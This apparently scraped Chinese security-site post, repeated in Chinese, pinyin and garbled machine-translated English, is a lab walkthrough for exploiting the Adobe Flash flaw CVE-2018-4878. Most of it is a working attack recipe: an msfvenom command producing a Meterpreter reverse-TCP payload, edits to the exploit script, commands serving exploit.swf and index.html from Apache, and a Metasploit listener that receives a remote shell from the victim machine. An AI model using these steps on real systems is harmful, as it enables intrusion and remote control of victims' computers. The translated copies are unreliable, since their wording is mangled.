| 关联规则 | 关联知识 | 关联工具 | 关联文档 | 关联抓包 |
| 参考1(官网) | |
| 参考2 | |
| 参考3 |
[SAFE-ID: JIWO-2024-2520] 作者: future 发表于: [2019-12-12]
本文共 [527] 位读者顶过
Flash 0day漏洞
1、漏洞概述
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执[出自:jiwo.org]行”,并且直接被getshell。
靶机:Windows7 sp1 kali:192.168.43.16
条件:Adobe Flash 28.0.0.137及其之前的版本 IE8浏览器及以前版本
1、kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径。
2、输入<msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.txt>生成shellcode.txt可以查看kali的shellcode
3、查看shellcode,并替换cve-2018-4878里面原来的shellcode
4、修改cve-2018-4878.py,替换刚查看的shellcode、更改stageless = False(原本为True)、修改两个fopen打开文件的路径改为要生成的exploit.swf和index.html路径
5、执行cve-2018-4878.py生成要用的exploit.swf和index.html
6、开启apache2服务,把两个文件复制到apache web路径中<cp index.html /var/www/html/index.html> <cp exploit.swf /var/www/html/exploit.swf>
7、打开msfconsole、使用监听模块 <use multi/handler> 、加载一枚payload <set payload windows/meterpreter/reverse_tcp>、设置参数填上kali的IP和生成shellcode的端口、exploit利用
8、当靶机使用有cve-2018-4878漏洞的浏览器和Adobe Flash访问http://192.168.43.16/index.html时,就会获得靶机shell
可以看到,已经反弹meterpreter会话,只要输入就可以拿到shell
Flash 0day漏洞
1、漏洞概述
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执
行”,并且直接被getshell。
靶机:Windows7 sp1 kali:192.168.43.16
条件:Adobe Flash 28.0.0.137及其之前的版本 IE8浏览器及以前版本
1、kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径。
2、输入<msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.txt>生成shellcode.txt可以查看kali的shellcode
3、查看shellcode,并替换cve-2018-4878里面原来的shellcode
4、修改cve-2018-4878.py,替换刚查看的shellcode、更改stageless = False(原本为True)、修改两个fopen打开文件的路径改为要生成的exploit.swf和index.html路径
5、执行cve-2018-4878.py生成要用的exploit.swf和index.html
6、开启apache2服务,把两个文件复制到apache web路径中<cp index.html /var/www/html/index.html> <cp exploit.swf /var/www/html/exploit.swf>
7、打开msfconsole、使用监听模块 <use multi/handler> 、加载一枚payload <set payload windows/meterpreter/reverse_tcp>、设置参数填上kali的IP和生成shellcode的端口、exploit利用
8、当靶机使用有cve-2018-4878漏洞的浏览器和Adobe Flash访问http://192.168.43.16/index.html时,就会获得靶机shell
可以看到,已经反弹meterpreter会话,只要输入就可以拿到shell
[Flash 0day lòudòng
1, lòudòng gàishù
2018 nián 2 yuè 1 hào,Adobe guānfāng fābù ānquán tōngbào (APSA18-01), shēngmíng Adobe Flash 28.0.0.137 Jí qí zhīqián de bǎnběn, cúnzài gāowēi lòudòng (CVE-2018-4878). Gōngjí zhě tōngguò gòuzào tèshū de Flash liànjiē, dāng yònghù yòng liúlǎn qì/yóujiàn/Office fǎngwèn cǐ Flash liànjiē shí, huì bèi “yuǎnchéng dàimǎ zhí
xíng”, bìngqiě zhíjiē bèi getshell.
Bǎ jī:Windows7 sp1 kali:192.168.43.16
Tiáojiàn:Adobe Flash 28.0.0.137 Jí qí zhīqián de bǎnběn IE8 liúlǎn qì jí yǐqián bǎnběn
1,kali zhōng dǎkāi zhōngduān, zhǎodào xiàzài de cve-2018-4878 gōngjù, qiēhuàn dào gāi lùjìng.
2, Shūrù <msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.Txt>shēngchéng shellcode.Txt kěyǐ chákàn kali de shellcode
3, chákàn shellcode, bìng tìhuàn cve-2018-4878 lǐmiàn yuánlái de shellcode
4, xiūgǎi cve-2018-4878.Py, tìhuàn gāng chákàn de shellcode, gēnggǎi stageless = False(yuánběn wèi True), xiūgǎi liǎng gè fopen dǎkāi wénjiàn de lùjìng gǎi wèi yào shēngchéng de exploit.Swf hé index.Html lùjìng
5, zhíxíng cve-2018-4878.Py shēngchéng yào yòng de exploit.Swf hé index.Html
6, kāiqǐ apache2 fúwù, bǎ liǎng gè wénjiàn fùzhì dào apache web lùjìng zhōng <cp index.Html/var/www/html/index.Html> <cp exploit.Swf/var/www/html/exploit.Swf>
7, dǎkāi msfconsole, shǐyòng jiāntīng mókuài <use multi/handler>, jiā zǎi yī méi payload <set payload windows/meterpreter/reverse_tcp>, shèzhì cānshù tián shàng kali de IP hé shēngchéng shellcode de duānkǒu,exploit lìyòng
8, dāng bǎ jī shǐyòng yǒu cve-2018-4878 lòudòng de liúlǎn qì hé Adobe Flash fǎngwèn http://192.168.43.16/Index.Html shí, jiù huì huòdé bǎ jī shell
kěyǐ kàn dào, yǐjīng fǎntán meterpreter huìhuà, zhǐyào shūrù jiù kěyǐ ná dào shell]
Flash 0day vulnerability
1. Vulnerability Overview
February 2018 No. 1, Adobe officially released a security advisory (APSA18-01), version 28.0.0.137 and prior declaration Adobe Flash, the presence of high-risk vulnerabilities (CVE-2018-4878). An attacker by constructing a special Flash links, when a user accesses this Flash link in browser / e-mail / Office, will be "remote code execution
Line ", and directly getshell.
Drone: Windows7 sp1 kali: 192.168.43.16
Conditions: Adobe Flash 28.0.0.137 and earlier versions IE8 browser and earlier versions
1, kali open the terminal, to find the downloaded tool cve-2018-4878, to switch the path.
2, the input <msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.43.16 LPORT = 4444 -f python> shellcode.txt> kali can view the generated shellcode.txt shellcode
3, see the shellcode, and replace cve-2018-4878 which the original shellcode
4, modify cve-2018-4878.py, shellcode replaced just to view, change stageless = False (originally True), to modify two fopen to open the file path to be generated index.html path and exploit.swf
5, the implementation of cve-2018-4878.py generation and use of exploit.swf index.html
6, open apache2 service, the two files to apache web path <cp index.html /var/www/html/index.html> <cp exploit.swf /var/www/html/exploit.swf>
7, open msfconsole, using the monitor module <use multi / handler>, loading a payload <set payload windows / meterpreter / reverse_tcp>, setting parameters and generating an IP kali fill port the shellcode, exploit the use of
8, when the drone has cve-2018-4878 vulnerability using the browser and Adobe Flash Access http://192.168.43.16/index.html, you will get drone shell
You can see, it has rebounded meterpreter session, as long as you can get shell input
1. Vulnerability Overview
February 2018 No. 1, Adobe officially released a security advisory (APSA18-01), version 28.0.0.137 and prior declaration Adobe Flash, the presence of high-risk vulnerabilities (CVE-2018-4878). An attacker by constructing a special Flash links, when a user accesses this Flash link in browser / e-mail / Office, will be "remote code execution
Line ", and directly getshell.
Drone: Windows7 sp1 kali: 192.168.43.16
Conditions: Adobe Flash 28.0.0.137 and earlier versions IE8 browser and earlier versions
1, kali open the terminal, to find the downloaded tool cve-2018-4878, to switch the path.
2, the input <msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.43.16 LPORT = 4444 -f python> shellcode.txt> kali can view the generated shellcode.txt shellcode
3, see the shellcode, and replace cve-2018-4878 which the original shellcode
4, modify cve-2018-4878.py, shellcode replaced just to view, change stageless = False (originally True), to modify two fopen to open the file path to be generated index.html path and exploit.swf
5, the implementation of cve-2018-4878.py generation and use of exploit.swf index.html
6, open apache2 service, the two files to apache web path <cp index.html /var/www/html/index.html> <cp exploit.swf /var/www/html/exploit.swf>
7, open msfconsole, using the monitor module <use multi / handler>, loading a payload <set payload windows / meterpreter / reverse_tcp>, setting parameters and generating an IP kali fill port the shellcode, exploit the use of
8, when the drone has cve-2018-4878 vulnerability using the browser and Adobe Flash Access http://192.168.43.16/index.html, you will get drone shell
You can see, it has rebounded meterpreter session, as long as you can get shell input
